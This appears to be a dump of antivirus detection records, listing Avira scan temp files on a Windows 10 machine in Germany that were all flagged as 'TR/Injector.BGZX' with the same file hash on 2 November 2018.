  Row(detection=Row(filename='avscan-20181102-051623-695c7d05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051623-695C7D05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052702-e5c7a1de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052702-E5C7A1DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051604-5e207cc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051604-5E207CC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061800-047783ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061800-047783BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062514-0787768f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062514-0787768F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055312-8dd3e28c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055312-8DD3E28C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062520-0ae0ab28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062520-0AE0AB28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062519-0aa4b12a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062519-0AA4B12A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a8fd4e63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A8FD4E63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052749-022df0fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052749-022DF0FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d1afbe1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D1AFBE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061745-fbe2a211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061745-FBE2A211', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060850-bd031b88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060850-BD031B88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055057-3d3f439a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055057-3D3F439A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061828-15aa4e7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061828-15AA4E7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060835-b3cbce91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060835-B3CBCE91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062507-030a0ed7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062507-030A0ED7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060850-bd15e86d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060850-BD15E86D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d0b4e1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D0B4E1C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060813-a7263daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060813-A7263DAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053655-474014d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053655-474014D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051626-6abf2b17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051626-6ABF2B17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061819-0fe33582', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061819-0FE33582', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061828-156b48c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061828-156B48C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062507-0327e5eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062507-0327E5EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055345-a1649983', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055345-A1649983', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062555-1fd4fb63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062555-1FD4FB63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e40e92d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E40E92D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052711-eb2e873c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052711-EB2E873C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052708-e9510b48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052708-E9510B48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e3e15daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E3E15DAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051647-777bf466', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051647-777BF466', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053658-498a5378', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053658-498A5378', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061841-1d75d79e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061841-1D75D79E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061842-1d92f656', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061842-1D92F656', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060824-ad430662', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060824-AD430662', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052721-f19a925c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052721-F19A925C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052721-f1790565', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052721-F1790565', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051647-7780613d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051647-7780613D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060812-a68b93a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060812-A68B93A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062538-156e9a6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062538-156E9A6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061855-25a711e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061855-25A711E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051638-71d409dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051638-71D409DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060831-b1546207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060831-B1546207', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051620-673accb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051620-673ACCB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061735-f5b2d5d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F5B2D5D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060830-b1015008', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060830-B1015008', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061735-f5a7ae58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F5A7AE58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061734-f522d1a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061734-F522D1A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055338-9d5ac767', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055338-9D5AC767', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050501-d2b7fc1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050501-D2B7FC1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060844-b92cc250', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060844-B92CC250', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061735-f5e5a9c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F5E5A9C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060838-b5fb2868', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060838-B5FB2868', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051641-73df4896', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051641-73DF4896', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:40Z'), dt=datetime.date(2018, 11, 2)),
